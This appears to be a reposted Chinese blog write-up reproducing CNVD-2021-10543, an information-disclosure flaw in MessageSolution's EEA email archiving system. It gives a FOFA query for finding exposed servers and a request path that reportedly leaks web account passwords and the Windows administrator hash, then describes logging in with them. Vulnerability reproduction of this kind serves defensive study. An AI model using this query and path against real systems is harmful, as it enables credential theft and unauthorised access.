【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现

admin 2021年6月15日23:47:05评论287 views字数 759阅读2分31秒阅读模式

0x01 前言

MessageSolution是企业电子邮件归档软件的开发商。MessageSolution企业邮件归档管理系统EEA存在信息泄露漏洞。攻击者可利用漏洞获取Windows服务器administrator hash与web账号密码等敏感信息。


【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现


0x02 漏洞影响


MessageSolution 企业邮件归档管理系统EEA


0x03 漏洞复现

FOFA语句

title="MessageSolution Enterprise Email Archiving (EEA)"

【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现

PAYLOAD:

http://ip/authenticationserverservlet/

【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现

直接访问如下,会看到泄露的账号密码

【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现


利用泄露的账号密码登录系统

【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现

验证脚本

【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现

0x04 参考链接

https://mp.weixin.qq.com/s/_ieRHX-7nnnWMeflFcNEnQ

【往期推荐】

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS免杀-Shellcode Loader原理(python)

【超详细 | Python】CS免杀-分离+混淆免杀思路

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

记一次HW实战笔记 | 艰难的提权爬坑

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

走过路过的大佬们留个关注再走呗【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现

往期文章有彩蛋哦【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现

【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现


本文始发于微信公众号(洞见网安):【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年6月15日23:47:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【CNVD-2021-10543】MessageSolution 邮件归档系统EEA 漏洞复现http://cn-sec.com/archives/297934.html

发表评论

匿名网友 填写信息